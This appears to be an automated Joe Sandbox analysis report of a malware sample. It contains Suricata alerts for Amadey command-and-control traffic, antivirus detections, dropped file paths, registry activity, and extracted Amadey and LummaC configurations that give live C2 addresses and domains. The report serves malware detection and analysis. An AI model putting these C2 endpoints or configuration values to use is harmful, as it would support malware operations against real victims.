2024-12-22T02:22:21.049253+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50572	212.193.31.8	80	TCP
2024-12-22T02:22:27.127593+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50580	212.193.31.8	80	TCP
2024-12-22T02:22:33.170948+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50584	212.193.31.8	80	TCP
2024-12-22T02:22:39.360469+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50595	212.193.31.8	80	TCP
2024-12-22T02:22:45.413451+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50598	212.193.31.8	80	TCP
2024-12-22T02:22:51.686427+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50604	212.193.31.8	80	TCP
2024-12-22T02:22:57.752693+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50610	212.193.31.8	80	TCP
2024-12-22T02:23:03.841486+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50617	212.193.31.8	80	TCP
2024-12-22T02:23:09.910578+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50623	212.193.31.8	80	TCP
2024-12-22T02:23:15.963476+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50637	212.193.31.8	80	TCP
2024-12-22T02:23:21.997068+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50642	212.193.31.8	80	TCP
2024-12-22T02:23:28.044776+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50646	212.193.31.8	80	TCP
2024-12-22T02:23:34.099774+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50650	212.193.31.8	80	TCP
2024-12-22T02:23:40.143509+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50654	212.193.31.8	80	TCP
2024-12-22T02:23:46.212321+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50665	212.193.31.8	80	TCP
2024-12-22T02:23:52.318557+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50669	212.193.31.8	80	TCP
2024-12-22T02:23:58.364622+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50673	212.193.31.8	80	TCP
2024-12-22T02:24:04.447895+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50677	212.193.31.8	80	TCP
2024-12-22T02:24:10.519028+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50681	212.193.31.8	80	TCP
2024-12-22T02:24:16.568999+0100	2856148	1	A Network Trojan was detected	192.168.2.4	50685	212.193.31.8	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:18.699038+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49759	TCP
2024-12-22T02:18:53.046933+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50191	TCP
2024-12-22T02:21:19.958374+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50497	TCP
2024-12-22T02:21:31.440183+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50505	TCP
2024-12-22T02:22:19.546142+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50568	TCP
2024-12-22T02:22:55.690496+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50605	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:12.042671+0100	2803305	3	Unknown Traffic	192.168.2.4	49765	31.41.244.11	80	TCP
2024-12-22T02:16:21.681018+0100	2803305	3	Unknown Traffic	192.168.2.4	49787	31.41.244.11	80	TCP
2024-12-22T02:16:28.617935+0100	2803305	3	Unknown Traffic	192.168.2.4	49804	31.41.244.11	80	TCP
2024-12-22T02:16:37.421176+0100	2803305	3	Unknown Traffic	192.168.2.4	49830	31.41.244.11	80	TCP
2024-12-22T02:16:43.848701+0100	2803305	3	Unknown Traffic	192.168.2.4	49851	31.41.244.11	80	TCP
2024-12-22T02:16:50.948817+0100	2803305	3	Unknown Traffic	192.168.2.4	49872	31.41.244.11	80	TCP
2024-12-22T02:17:02.800003+0100	2803305	3	Unknown Traffic	192.168.2.4	49914	31.41.244.11	80	TCP
2024-12-22T02:17:15.391073+0100	2803305	3	Unknown Traffic	192.168.2.4	49947	31.41.244.11	80	TCP
2024-12-22T02:17:28.444771+0100	2803305	3	Unknown Traffic	192.168.2.4	49980	31.41.244.11	80	TCP
2024-12-22T02:17:37.607585+0100	2803305	3	Unknown Traffic	192.168.2.4	50004	185.215.113.16	80	TCP
2024-12-22T02:17:46.221182+0100	2803305	3	Unknown Traffic	192.168.2.4	50026	185.215.113.16	80	TCP
2024-12-22T02:17:57.454162+0100	2803305	3	Unknown Traffic	192.168.2.4	50069	185.215.113.16	80	TCP
2024-12-22T02:18:05.847798+0100	2803305	3	Unknown Traffic	192.168.2.4	50096	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:18:16.150144+0100	2803304	3	Unknown Traffic	192.168.2.4	50121	185.215.113.206	80	TCP
2024-12-22T02:18:37.111236+0100	2803304	3	Unknown Traffic	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:39.513727+0100	2803304	3	Unknown Traffic	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:41.135548+0100	2803304	3	Unknown Traffic	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:42.521973+0100	2803304	3	Unknown Traffic	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:46.528368+0100	2803304	3	Unknown Traffic	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:47.990676+0100	2803304	3	Unknown Traffic	192.168.2.4	50163	185.215.113.206	80	TCP
2024-12-22T02:18:54.731503+0100	2803304	3	Unknown Traffic	192.168.2.4	50241	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:19:05.988229+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50276	104.21.21.99	443	TCP
2024-12-22T02:21:50.516015+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50541	172.67.209.202	443	TCP
2024-12-22T02:23:15.693434+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50636	104.21.89.115	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 5cda6c90d7.exe.5040.12.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["cheapptaxysu.click", "necklacebudi.lat", "aspecteirs.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "sustainskelet.lat", "grannyejh.lat", "energyaffai.lat"], "Build id": "CZJvss--geopoxid"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 57%
Source: file.exe	Virustotal: Detection: 59%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe

Code function: 10_2_0033123B CryptContextAddRef,

10_2_0033123B

Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_14021217-0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50060 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.115:443 -> 192.168.2.4:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50189 version: TLS 1.2

Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: af155ed129.exe, 00000006.00000000.2441026103.000000000032C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp

Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Directory queried: number of queries: 2002

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_003436A9 FindFirstFileExW,	8_2_003436A9
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_0034375A
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_003436A9 FindFirstFileExW,	10_2_003436A9
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	10_2_0034375A

Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\AppData\Local

Source: chrome.exe

Memory has grown: Private usage: 6MB later: 29MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
